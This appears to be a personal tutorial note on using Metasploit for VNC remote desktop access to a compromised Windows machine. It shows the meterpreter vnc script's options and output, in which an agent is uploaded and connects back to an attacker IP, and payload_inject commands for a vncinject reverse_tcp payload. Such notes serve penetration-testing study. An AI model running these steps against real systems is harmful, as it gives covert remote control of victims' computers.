Hugo Perinazzo

metasploit vnc

Aug 10, 20242 min read

Method 1

In metasploit / meterpreter, the script vnc.rb allow you to drop an vnc executable on the victim computer that listen for new connection and automatically, reverse port forward this port (5900 by default) on the interface 127.0.0.1 of the attacker. So the attacker just have to connect via a vnc client to the address 127.0.0.1:5900

Once the connection is closed or interupt you have to re-run this script to connect again

Usage
meterpreter > run vnc -h

OPTIONS:
    -c   Enable the VNC courtesy shell
    -D   Disable the automatic exploit/multi/handler (use with -r to accept on another system)
    -h   This help menu
    -i   Inject the vnc server into a new process's memory instead of building an exe
    -O   Disable binding the VNC proxy to localhost (open it to the network)
    -p   The port on the remote host where Metasploit is listening (default: 4545)
    -P   Executable to inject into (starts a new process).  Only useful with -i (default: notepad.exe)
    -r   The IP of a remote Metasploit listening for the connect back
    -t   Tunnel through the current session connection. (Will be slower)
    -v   The local port for the VNC proxy service (default: 5900)
    -V   Disable the automatic launch of the VNC client
Exploitation

By default the script connect automatically to the vnc server, but I discourage that, since it use the default client which don’t appeat to work in my case. So to deactivate automatic client connection I use -V

meterpreter > run vnc -V
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.12 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\faXPeF.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.12:4545...
meterpreter >

Then connect on my own, using xtigervncviewer on the address 127.0.0.1:5900

Method 2

The second method is explained in this ippsec video

Use metasploit post-exploitation module payload_inject to inject a vnc payload in a meterpreter session

msf6 > use exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set PAYLOAD payload/windows/x64/vncinject/reverse_tcp
 
msf6 exploit(windows/local/payload_inject) > set PID <target PID>
msf6 exploit(windows/local/payload_inject) > set SESSION <target meterpreter IP>
 
msf6 exploit(windows/local/payload_inject) > set LHOST <your attacker ip>
msf6 exploit(windows/local/payload_inject) > set LPORT <your listener port>
 
# you can set ViewOnly if you want
# don't edit VNCHOST
# don't edit VNCPORT

Graph View

Backlinks